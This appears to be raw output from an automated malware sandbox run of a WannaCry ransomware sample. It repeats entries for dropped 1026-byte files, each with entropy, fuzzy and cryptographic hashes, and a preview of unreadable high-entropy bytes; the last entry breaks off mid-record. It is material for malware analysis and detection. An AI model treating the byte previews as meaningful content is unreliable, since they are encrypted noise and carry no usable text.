                                                                                      Preview:*..c..S...;..^..1......R.i)....r{..g.."$].......J.v^.;.{.4...b...._.P..].'.iIfd....`.".6(..p?....Rv..G...u_...u.#..BT... R.............q...fiL..V..;.v;z;...hE}m.WA...P..c.2..=L.h?.g.M..iACA..[M.`..p.b.Z.P..X..O....C-./.X.H.FuLO}7......Q...$Yh.Y^..h....D/$v-..w....@o.$...k.$Mj.M.H..>..*.@...$`VI-.5..!.h....'!.1-_.".L@E.....(.YPl48.I]..D.?.?...N8..._........%.~u.pk?b./&..\..^@T....].e.`k.....).s....i|X.N,....*.H..n.UR.. -.s.)...-...z2..=..r....`.Dg.M....[)w.o..s.s.MIX....V.J'...Td.e@..3L.*u...'.E...n..B+"..~..w.y\..........#T...'#..{..eo../...S.b....v..`uD...l...7z`..$S.[.=...P(...d.#..u.Y.kV.j;.M7G...C..)..>.).\....C..Lq.V. ....#O.Q.q..../...NR..c3.iV......KO.1._"zFY...E....A..V.W.&U.;0[Z.......-.......%r....ab..%/...V....w%vS.$+..Z.b%.`.L....0.i`.;..W.."...`C..!..Wk...`Xx'EHt../..id..G...").1lJ..........f.YO]Y........N..9: ..M..v...F0../.z.:...E..KX...E..%1.G.Hs...7..?.1..as...j.e.....s.#Sv.W..4.><a.2.i................\..'|y.s...i.R
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.810470550061417
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:AL1mL6gQpODGLlwOUsd6kMge/DnbEJ69pkgduywrSJ1jsESa3:g8gp8SlBUsd6zRfEMvwrEsE
                                                                                      MD5:973A618372EB87C1380197455C6A1E8F
                                                                                      SHA1:5F7C4757807D10E5832D290493E641D1B0D29AE9
                                                                                      SHA-256:E9EA6407D7382E68B84C1FD0E4425258FA91B19DCCD7A10BFE53EB15101D7E80
                                                                                      SHA-512:C69BA24EEBA62E1D609C5D049A7EAC9631031BF4FE2090CE2E958C0EF3ABC85C3FA6493B72F90C4EC0506354D9BA15E0F1483DA1741DF25103A44990A391064A
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.j..{.f..y|.#.Z..5..s....]N....6...........K.-/...b.e(.C.?..|}j.B.LM{x..#E.a..).X..YH..j:.....I..c4S..),.Kx.)"F.....).V. .!%.Y....=....S.vm."..,*XJ."..%....x..G.I./@o..)e..]|-......b1P..w.....r.....K.~n.1....!.........S....|......s.Y..w.?...Y..7.D$.8.G...-k.!2.I.c.z..........h...g..e.........v.K.b>#Bo.h.....)Q.j.b..L.........W.T.....3..W.f1d...|x...s...rE{.o...C.L....g..........`....KXpC..s."~../....y..5.r....q.oY..X.>%0.......Dg.R.8............&.H......1{....k..G..A.*bg.|8&.MW....<.r}.zi..35R..j%.....j.O..8j0..:.......a...y.aNa.[...y1.j...`M..[..2..+..G.%6..O.B.V...fLY.:......"..JWM...|u$.*ua.u..O..h..C.m.i0K....CY...=....?V7......1.L..b.Kb.[...........=..4$ ...x}.c!...C.....e...d..=.qC].Xk.........B.It...:.{..1.<..W.)..y..jtI..Z..<..R?o........H.7...#......".F....d.;....G..FR...A..;..}...==XosQ.Q..j..._..N.h.=p...:B6.E%.4...A....(K.o#f%...&>...4j.^U.....i.1...u..]....nF'!..c.]E!dW.......7h.k....,...Z>.^..@NXvX33...L..6rt.N..1..#e/
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.79677936759439
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ukZfZBd+iUZZf5YfpgRDqpoHNzEIQTDRxkEGZ9q0gb:X3+iUZ1KfpghqUpQf7Gytb
                                                                                      MD5:FCF52C15AF94EB63F8EE8E6A76551B0A
                                                                                      SHA1:71A4A917C6501686ED021B5F0074B4F1A95B7B29
                                                                                      SHA-256:86EE084203EDF5DABFDA53D7ED2BC250DFA2B48962001A702BFE3F4B699110BB
                                                                                      SHA-512:57D6363CAD641FB0A3E571EE8F8500FF814A7BC54E5FC09F9B836DD100FB62C91AEE112F76802E6B5965829412E9CADC8DF8A164643E0F3778A0515017DD9DC5
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.x...x.p.&:G..f.1.w....).;..9.+.Q...qqI.I.Wj.#.F...u.i..'..&P....u......#l'." .....T..0..C.-..G..)...lWR.R.)..C._...%.._.?.Z.|&..G.........]LZ.W.|,.q@.7.N}..x...7*...'^...m7..M.I...:S.....S?d3]..k....LW`..T...w!.a..>=.Gr..4..4..rb..m.p.8y7xq..U....8u..(^.l.e..Sp..Fw9....=.+C^...[.h.t.f...a........>p......aF....8..jZ1^[.......(L......Fe.....Q;V./.+.E......r`.23..m.&.w. .?t.L}._..{.%t.&J.3....P.cE}..$..>.;<f..A.......r.@.Z.........x.....|.t..^5.p..9v...?.....V.u.?.".l..X.:v.).+..v....{.#&2;B..gPB....P.)_....h....._p....j@...|.\.0.\.y..'.$*.z..,...........St.T.$._y..9mt..\>Y.....P....0.Z.n@.K...CHr..)I..kX......_7...6N.qU.T|]9......./..1..)h...-..=2.s...$9.a_.P...j>.9..h....../.....M...5t.]....H.l..1...&.6...Vx...'..?..,.Bi..Y...^..N...@.... ..'>.9.....M...k...YNX...ojZ...F.tv.8...Vu.v......AeJ..K.^q..a2r.q-<..._...@.Z....[.B.x.b.,..t.aT...{3.2].J.H6..K:..b3..!..`_..!%.T..M..{.Pf.@_.5..C..DZ...$...#.k5.n..S.....N.I?.....M.._^...1..V.....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.799058261106798
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ArGSJmCTDFFN/kJw4pc7rF8+GUmtHWpOBwgTtg:A6uTJ7D4WP2P1WpOVtg
                                                                                      MD5:D2FEF7D96D48941C91997BC1A4F73A07
                                                                                      SHA1:6B73B8257F4B07FAA41C32704F6D11369F56ABCD
                                                                                      SHA-256:4E53C18F097747B374A16B10E4FA18B4DBB623B74B6F7DA437CF70A310465C47
                                                                                      SHA-512:060D76FDBEEF2102A7F29E9B895D553B2E3C747F3527DD3644356C193C377D5D2CCF144D39263B9F3876AB7AEE45EA75445D1C5C5E9CEB80165BB6861C45280F
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..I..~3.\....S...._#,.rzG.2t.`...[t.X...X.;..Eo;.*..T.,*. w..".BF....:......\.....lPT~yG.?..`F..=.eY.....Jl9..i....9........l.a....W.Vb.e"t...u.._....^.`\.....C..y.e.....i...FrHg..].e.f9......Ra)..fl.......eX..h3r.-.>.....?(s.}He...k.)B.a...S.in.&b.ba!..v./...9N.k..d^..*...I.JxM.5[O.B.:y.#../HW.j..........?&n.4.......N7.b7..$.f.....@...f..).t...K..............."az...R...z..@......UP.8E..@..sc..........0....-Q{kN..a.isH..k.X.....<......U.V.UB{..9z..4{.F..BQFF+V.`....J.0.....f..W..<p.@o..]..S..VoU..QI......6..Ya>xSr.o ..F...b8..T...S..].b...<.$.....k.}...3.K...B#.c.2k......&...*..,.2..,'... ..o.....UlSm.i!"..6..........k.s5...7..H2K.'."E.K.9.._..d...6.>......d..~.>q......t.`Q.,J.s.6v....[.....s...m...,(.......2....*$.=0D..........d..2..p.....:n.w.@\V..p..j.9...]...4,z}6P...rN.l....a.,NG.W[...?.v...9....9..W.!.iV02....i.?...v....71...!9..z.^jU...0C`.....W.......k.T.z.].o.5.H..{..}}^.X'O.K..t...b?_...P....WB.-.*.....m.d.....bzvQ.g..v.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8118608335094555
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:FEHPdlqYcRRUC41HL3JoYHsR7qy71ajshM4HveBwp1CuV4fw:WHPdlqYcfUTtTqp7qyBayMDBw74fw
                                                                                      MD5:E8AE12E5E16CBE5BEAD7BD994158B5A7
                                                                                      SHA1:6609FF1DDBF736DD6C97A5FC675A61D46CDBA998
                                                                                      SHA-256:A3A5FA8F390BA18224F32422FBD10D46D4B5DE8B866219EC577B65B6C2AA26F1
                                                                                      SHA-512:E209CB25FFA18D465648DE643EFAAA1F3A0C06B2A0EF122D59AAC0C24F9A716AB76877C4CE9832E526BF8CDC41F8EB9E2451BF95FC1397FA86707852C197F987
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.aG...<..N`.(t.._.8.k..sjT...-\......y*...k.{.-.q`......V;.8...7$@.;..8..5<..8..Fs.....Q.E...OG.....p...;R...5...-..eF:.....%!0..D7..........>...L*0..*......@u.[.b./I.]p..oQ]..[......v+=..<.A....2...u..(B(.M..};.o.~.z.>..DR;.0q.5...S..LMV.....YU......-g@....~.h......-X c..:....6e_.....eI.0X..].r.&.l}1gL..Kf-.>>...,..R.hU.DM.4B.....+.{.H...ob...L.m...5l.W.z.E..'..cpt../? f.."k.)fS.)..l;.!7...=J..<o}.d.......T..`.Y.....>[...#...X.5(....q.m...u.yc....K.N...V....d....W>n..r..$.+)..HI...Umot....y.r.V...R......9.9(.....e..oi3q.DU....'z1/ ;j.|I|....^.%..,=...7j.L.Ir.NG......-.:U.5Lv. .l.+.J..3...;..FH.`.......2..hg.u..2.....|.:]$.....;..w.[`k..S..=q].!l~.d&.6.~P_v.U....4..M......G.].].]S;m..#.%_b@...)X....WK.(....}Uj..w..n.9...U...0J!.s>.F..G...!.[](...wC.U...i..O.a.{.5{....N..s.t....&.t..q..3F....t.e~c.[.6.n*.K#..E..!.W"...>.wh..u:sO..P.Q_...V.........}.+......f?.?........".h2..l....t }.9....#...)3..5.......d...o........n"n....34..q.kZ.Qwp....
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.786712490368082
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:CZjUIRPsuBPILaNL/E0cpsIJkdCGUkFCBoWspdKmkij:CZjPPsuhILYDMpsZcGeGdHkij
                                                                                      MD5:3F7352566A99E3C3E0F7ED91807AA1E2
                                                                                      SHA1:34F9747E29C062E513C0D054003BEA4A1EB4AB3C
                                                                                      SHA-256:70670470B49B5B0520F2F4D8EF1F274975207AFE15AB07D910DC3728A429BACC
                                                                                      SHA-512:5131487115B376661138487316DCB60522F4F88B06D2215EDAB543491E2EC196D08BED9EE91DB55A9FAD280A63BA3F3DB78945841E1448FE09B92AF171E3BA6C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:se..O=.:...P.Y.....<..Zy...k..l....`Pq.W=.~K..C....9.....t...V[.L.=o.4.....3".<g.`..w.^..).6f.!*..x4..a$.v}!...29i..6./O.`.c.U.e.i.U.8....qJ.3..@Q....B4;u.q.Qx..B..........8..o...g3yf..t.8y..g6:.....Z.......d.....W#eb.L&..5.2.....]....@....V.!.#v=`...9...1._....R..`.ZY}.A[pz.....d./@.....D..W|1...$^+c.$6}<3J>rI.M..T.Y.....V=.|.. x(e..c.:.!....'O..wM.o6..f>ol..Z....x{.....i...x....NJhd.......Y. ~.1.....X.{...p0....8}.9sN..m..&.....,...3".N..Ux.....J..i.[gH....#.;?.....Mj.{..?...]x.....^f.......o.Y....t.\.8pP.u......=..w<T$p....{g..&.!..[i..k..U..&..;.M.SH....zM.,?z..I+...bz...e.sx0...a...U.......n..J5.^..{..E...G..8[....3....a..k.. l.9UL..9r..W..-.d.m..3o.I-Bom..].R..9Y..f...3:.h.Z..6-0L.....K....ul..{O...(,]..^h.6....]..6o~8...W.(X.......3.@.r.{...`G\.&.^..6H].0...V$Z..u!..\s.L..f..=.N..... ......%U...h...ot...0...l...l~..~H........2..'...&L.....J.<.~/(E.....3.P..ct6..l.b.6..+.t..xNd.. Xj..5T..yP.*..I.~.;~....-...1.h...Q.0.2..B.q.Z.Xm.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.804028976211453
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:upSN4Fs+OToQ8AfPoyikIdYSC2PPhO4fsEYBn6Rcnls:u8N4FIToQ8CoHYSCu5vcnls
                                                                                      MD5:0DFEB107C7A07EFFC1CC35D22AE590CD
                                                                                      SHA1:361711F02BAFC5D3E3539A8EAFC2C379B877628C
                                                                                      SHA-256:0F8C4362E7A8D5D15DE83B1A2465DE42EBB16EA6F30120155B52BB72953B3E23
                                                                                      SHA-512:B0F4675E5BFF36DADD5A12DF891C14323CBC956D494F3750D58AE7370A0D5BCB5EB6C74A9408B0A54DFEB8DD095DEEE3C777F0BBF12FD0FCB2C1351704824768
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:i...4..OU~Z...w.m..S...3...^...P.n. ....6r.'...S....*B...nW4}y.>....;.}..g&.cX>....f...\~.b.(..4k.xOLY.\^....Q.......}....3i>....5.P.......7~P."..t.Y.RY|..Y..C.sS+.6z...hm.........^..V..........=>@..8.J..|.B..T.f......qc%B...{....*_.}u...[.l%...{......Q.b...}.5.:..:.f.V_;B.."j.J.......s/...:q,L.K.(.&.5S.......v.ID.3C...f.........F.4x.n.>.@.qNvHe.....H......3:5.e..!....!.TN...L.....m4K.......$..N...2.E.m.9....A...X.d.U.h..C..XvH...|.. %#K&8=.k.4.>.\zL.[..t......]B.UO...rL....i.../...d>W,.....S@.,...xp%R.-P.z....N.{..MO.s.....tU..n....=...'...*0..:.E..(.].....6.P.$....a/..3.+.p{.+..PR..}.]%..L...J1.....w..W.&:I$/.5.A..p/c.w.9.. .t4...Ol..%.5#RU"..?u.....y.7.E..`.9.(..."N.....Orb%v.I....gp;....9...tf..2.-T...dn..t..!.....$.(.+.......w...i8...]$...h..t..g..x1..1)..[.a..^..4.m..(k.9..!..I=..J..-dT.u^.S7.SMMx...5].....u..!...V..o.@.9(..c^"..lA..T...RcD7.J+..i..).^Y.......}.!CZ.B.r..N.& 6..B...@..Yv....@.@...x....C.Bl.m|5..<...a...h..)
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.811502330952758
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:6axw7drHcTmoGZ4LGDPwBqr1xBgxjOEDfrtEPvMfTB4:6pHcTvjNqx3eXRl6
                                                                                      MD5:E751C51989320C5668B1588F775E490A
                                                                                      SHA1:195951F6DCD562DCCEE2D3CDE3334A68A73C05B5
                                                                                      SHA-256:E6E38FAFEABCB94DE10EE154A63C8FAF7927B308F677176FB72B6F9E6E89840F
                                                                                      SHA-512:43FEC04AAFDCCB63AEB4136CE89CEB8B6E49047483EF4189F26C3ADE73BE6296DB186870AE473639D2770ED9D0D5633662665F84563D39A3C67FBACFEBF08DFB
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:b..._(Lm..BX.=.s.0\..$.`k.g.T.?..h.4..A..D .......2j..V .Q..d;.}5.Gp..n~.e.(/..Y..M}.7D+.$....y>.....9.......MGD.Yas....(@... ..j..5a.C.z..".v..0.....Cg..R9.$f.`.XH..=..U.;n..W.p..k.Ua.OLf,i..)...h....#(..g..h..[.=C....b...X..IA.]#g..Oa.8.T.e.Ak....N..U...#..7.'u...g(..].......*.2.....j_(&+z....?.*...Y...7.K..p..e./.........zE.i.tN.=mE~.X...........*Q..*..s.7{D.".a.......gi...F-.Km........%....."...cn.8.L..Y~.:..;..a...w.&R.....=c..k|:@.g....2.f.s...).x4...cw8.R6.....^&?J.)CW.._.&;.... ......E.D.PR.f....F......8'.4d.j...w..d....?1K.Sd|.(n......Q.^a..6*.@......."~$...M.|.>.x.. .p..'.;.....;x...8..q..]...m.".Nr........U\..lz...(UA..f.....B..u'0 .}.&a.~...g{..*X<.;.\9....T...N..'........<Wv..j.F...<'v3....H...!.U.".`.8..........fv......-..6.@.p..s.,c.sO%Vw..t=.en..PN..i.....{.B..<..uN...i.#P..s...^U{l"..#f6...6..7.....7[.sr...c..^...k....n........p...<..BBd.~..@QN].a.gb...4.FD.X..!..L.f.\0 ...2..`.\T.......)...{."q....*..8 ..ki
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.805636096650943
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:boHmQOBTz2XBEnet8tvsRhT7Z5SdhGpLuhpb:bTz2xEnety0RVFYdhGlG
                                                                                      MD5:FB99F8A524B053E740FBAE3C04DA56D1
                                                                                      SHA1:6DC54C75AFB011EE583D03525CC2EB38DCC726FA
                                                                                      SHA-256:80B20AAC7B0EC90B70A599C35EF1E691DD4681E32D21F65DB5EAAAADB46B89F9
                                                                                      SHA-512:79F68946E8C64A8EF3F7F3A798946D390979AB2EF525421DB2DBD39573E59EB5663C516BD0BD3A5EA0741DC1019E58357CF55B2B08FEB2DA5C5EA02AB861D06B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.H..O.D.<...I%e.(.....q./@......E........Rb....m.L+@o~..H.[.+j.}{0.HKK_`q.!]x. ..|.....Zf.......=.....tX.d...AP.V.8.h..g..g.0..O.&}.R4.(.!.y."..h...l....Afb...e...{b../Mh.c.?....4....<2...K. ...%..y..T...}A..U$..........].G."Y...~....|..L..>.EpT.....^.e......oG:Q.+.0.xy....3.+.@..3.."..P...3K.8.\...V..@.....<.&.G.}.u...X.!.....&........3...=......Bw.X..........t....Ma.%%D.d./..Q.*..)...K.XD....(.4.....s.[r/............,.j..6.:.......2.....F.....W%x.sW~K.]..V..........4g.`..K......R.j..n..&L.Q.P...AIv.O!.I4.h.......Y......%.g.n..D...3....O..9......#.\g....+.~m..:....Ko...H|O..%..~..I....1.}.y3Y.jh..2.s.p...c.W...k..<m..n.(gd*r.d.V.3..R.:. ...g.#6.....4.IU.Mjk..Z$..z....o.@#...6p.t.V....`.<..3d.20I.....I0.9y.r...~...XR.]...^.^X.=bZiKp2.uTbX.../.\.....)..'H.`.B.]7.mk.R<.4..6.G./.a...$.,....F...NO.((@.O5.(.D.E....#"..k..'=.lj.D...B...E\I....#S..U..w%.........(6ps.\l.....01..!uj..c...k..a.[-.H.....*w...=.|-<.4OQ..$...#M......D9{J.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.820695425765881
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:JQQBXpz31KO6AismlOt3l9TfzXu6++OETVZINgVX7zY4GZrcsZX1Sh7:JQQB5zp6AiQ3lRf66+SjIk7zYRYsZXM7
                                                                                      MD5:DBED66C1E6F85CAD024064A8F4753BB3
                                                                                      SHA1:578616EC1C5AA7558AEBE848C5B4FBED19FBFEFE
                                                                                      SHA-256:271BC69A0B3D096D690BE4E74049EE48BD493431D3B2B371F75B844E5C1AC8A4
                                                                                      SHA-512:48FA278EEA9479F5F7365524BCC5BF8454E209DAD09BF19642D532358C50F24AC97615D1874257D59A0C4AE04AA4276F33F58B2273352D6CED0B7F2CB20A1C28
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.\j..?....A..g......=."3..v..f+T..v.f.GJ...t..$\.K}...$...X.f...Wq.\..S...=....c.g......z.....?..e.^...1.iQ.....H27k[....5......|I.........\....@C.............su,.7m5...;./.9..?8..._..m.a..k.....&..M.. .O./...O\...&.+..9Jx.9..}.d.F.jg..-1Z...zW.........&...s.@(..yt.......%Z.......31..msY{L.....k..arxM...c.#f....R.t.4b.h.........C.....+.T...1.9..o.I....s)..2gz..;*.}.6B.[...7.6;......-G.QG.'...S.....2{..-.x./&..{.IS.L+....%....o......{m..K...qK.8...q.72.....y.&....A.3.....[?....g...',..5y...'.........7Fj.....S..A...m.].&..B>.\kS.F=g..O.x.>..../x........06../....hU.4$`.1..........f......9.2......Wa...ld..;$.*..e9...)...C,$..Z\tVy.6.Q..,.I..kE..p....D......[.v5..H.*....b....DT...........@..........?).}..V.!N.\ni.a......B.T.0..).D#..Z....?;.+.....*]w..mr...6.o.]c.....->......UZ...:{w..&^....?.......o.Y..>..o....=ro.........._.......ZZ..-3.t...i.:...).s~....>._1.!.#..9..B..6.e..S4....{...fV..1..b...!...1`:?...C.z....>..%N|...e#.sP}
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.814394159845375
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:McpkNJGcg1SJKMYipKOUg5rDrDZFCLiQiuycnd5N7+Jmm0/N2lI:MwkNJGx1qXYiSg5rDrD6iSnd37+Jmm0b
                                                                                      MD5:8F5D2DA2036D782C03DAFACD29AC0346
                                                                                      SHA1:DD8649CF1335C21B06247EA2123F1A688039A06A
                                                                                      SHA-256:DB72259C5CA12EFAADCFC053FC55A47548F78365DB59380ECCE7F0E0E62AB0D3
                                                                                      SHA-512:AF04F6873F0B933143A8ED58562D70F05C5042616E9BB15978E4D4BEC6B1FEAB01C63258C37D2EB83E038FC1C09B2EEDA4FC1185017A43711F445B64F644951B
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:A.i%.J..|F>R.F.n#.$E .|....!X..S.8.....G. .RI2..S...hS,h.......{f..4..dY.j#).>.3.,..Y.. .="..........5....{G..d.|..ra:.fP.....sB^=..o....`n.t.."f.....N..r.m.X...+A.A..Q@..W...A.....6a..Y<.3..D....V.e.s...d..}...=......m......K..1.B.....N<.Bl[.J.l....v.jn..x.<$.(.q+3....)q...,.u>)O..q.M4.A%..8.e.\+tOHCYc....V.Q.H....w.r>...@,....,.a...'.r6]1......K._...4 ..6s.w.lKY...X.......%.:..1-.i.....Ys.-.Vl^7)...^)k....._@...LvOi`...'Wwv....yX.M..9..K.\i...t.k4t.C?=M...G..6.X`.(...K5!..}.a.'.2.b..#...b..I...Z..k..2*.....kS1.....lo....,9.O\......?. D.L.VS..5.o.N....WgL....y..._."7....D.Zf=D..3s..8J....;............g.Nv.6.x...{"...1"..."3../ajn.cUQ._..j:q.8.B:...C.v..@.a.3hd....M6...".@..m...<....O...vYr..pp.......M.r.5...,.. ... .....?.7Ng.F...k....XX.)....!.......vK...IH.......x..(=n.x.7..@.g.H|...Fy...(/.PPO...|G.xK.. `.4.*....G`.T_..6.0}.8..Z.}.Y>...4...6.e.(.e..k.an...".|......BU.0.?."..U..<S-.ez.#.N.:.).0..jRe.w..Y.6#..M..n.P.1#.i....*.=..b.}jG...fp.x.H..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.8360167821667
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:HDs8nx79u/W7fTKZW2ltTozIsUqDtFndxC16n9EWS3j:jsObHbTRytkksbvdxr9mj
                                                                                      MD5:5B489BCBB89AB4C1EDCCD450D6F5F77D
                                                                                      SHA1:FEFED5AFADAE5FAE9671F18EE129765AA49FAAF3
                                                                                      SHA-256:52D6E6184D8CF19AE46A101801DB6093DEBDB98819D6E3B8C94BBD6100C21743
                                                                                      SHA-512:B9E5009DDF65B49DCBFBAAE12DB1BB33D17CAB49A860B63D2D3BF47726F8C8296CE1BC7FCE08F0DA0F8C9A27516CEA787656B930488C0C036DFA3677C4AF176D
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..]..F7.5...}cj.0..,"........H.....<.'.{.u|...T.}....p~y.....+E....9...e......bvr.v.f.{{..~0Xo..[......>...Rh...t....|v.=..].....'.......m.Q.t.......'.m.....u.. .()..~.\.O.T..&...'..W..s......El..{...xT...N.3.r..d.A.........E&<......(.1Uz........KS...F.W..G.01.g..oP.R3J....rK:U..m.B:..u.=.,.../I~......O...l.l...+._....a...35 +......a.#R......aD+2.`.5...r.?.S..w5..W=.A._D...X...t.@~..za...?....<...V.K.-.X.....>.>.6....(.X..d.....l.."{..af.....M...D.b.n_.kI-........c..-..t..?..K._e<.u.M...{.s..[..,m..&.......O..Y.K.SE..H..j..tWp#.C.b...><g......NA...bX..%..)..z.=.D..q....j}.b.KTC._}I..4.8.^.v4@b...=d=..A.|Q.V..*...#.A.s5......kQ5....j.g>);..f.;...z...].....s..!:...$I...,.qB..P6.Q)..../.R./rzD...V..~...7.'..@.-...?......q.6.b.......P.E2.....(&[.w..........L...2"N....jM._$;L=.B.\<_[(j..........k.*fB.$a.r............Dp....wU.G.Ht.dH..tY.`..&...d.) ..+..n..A.i.\.l...a.W.6...c2...;e~,1.P.....y.....}...=.......i.NN.;Q..u.\Z...u...@.^.`e 9.sF.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.792248828138754
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:HE3UqYy37ZIj0wjOD+dIWDN63IzAt7akdflfjG/he:k6y37ZI0GO6yA6l7aktRjQg
                                                                                      MD5:BA5AC4486C007CE780589F281FAB1DD0
                                                                                      SHA1:10F644F3D0001749D7F7957E9A9B20DB955B6709
                                                                                      SHA-256:E481B821E28BFCAA0E6A622743CC914FBACDEAA4C4B03666D049B3BDFBCF5183
                                                                                      SHA-512:345F375AA2EC6E82525B568A0091000500A8FBC25FA06C8EAACBD0D0FD73ACEA34099AE033B5EC68877133DD1BC138E7A8FD73A09180498695897DD528CFE43C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:Ts....\..B......[.@.^.;._.../...,H...m..u..T....=....#^z.&.E...6.U.v.....;vg.b.|....6f3-.....B.$'... i.....'...!{*x...:g7...]....I.....~...MK...._'......~......D..M.....3.....[.IS.2.D./...5\(+...........[;.6%$e.r0.J.5.o..@.a....>Xj".2....e.....nZ3Y.......@. %.H..a.(.(.T.....2.......k.j..Y.J<m..Vi.]..3bQ{..d.C.$q.Y.~..]=....l\r.Imw...f....j...*......3Q..W5.B...Qol:..1=..D...e.R.Z1E.si..%Tc..X.u.#.1.S.....i.8...S....N.).VU&..,......x.r.hOT..A.%.\..`7..q..-..EM/.r.....l......$;.. .y...*.......|.d.9..p... ...b..X/..U3.vxU.e.D...R.......,......s.LY....jN3.....j.bm...~...S|........n.k..C.p.9...&.#R.Cb!.Oe.2.K..:.E.#<..'K.....hDW.......T.|.+.z.kn......y..M/......M..S.g..Y}..4..j[PL.C.........w!F-=.l..|.o...B.{..:U^..*....?.::Yy......x.J..^y...3}...m.AL...N0G..r...]^...u>..p.I..n.8y..2......}..R..r.U*#..g..L..........l.Vee..m.a...$*.,l..l6......Af....+vQ....%@.Z.G..."....s.......Bk...X...%8...f..Jx.8.(u...a..g.ySX~...rM..Hk].
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1026
                                                                                      Entropy (8bit):7.800668927446763
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:0ipztOLPULB+OFdAsUlYqDE0UiiKktyAaalI759zzan:0ip5OLPUL9AlA0+l8elI7bnan
                                                                                      MD5:A90AAF9D97AADE2B623D12B03E28954A
                                                                                      SHA1:FAECFBC53D0C8889AB2169B74F01D55F896C3489
                                                                                      SHA-256:6C09AB875AA6FF72B8F3FD401E4A7AE1B02C396EE42B7812CD5BA332742506BF
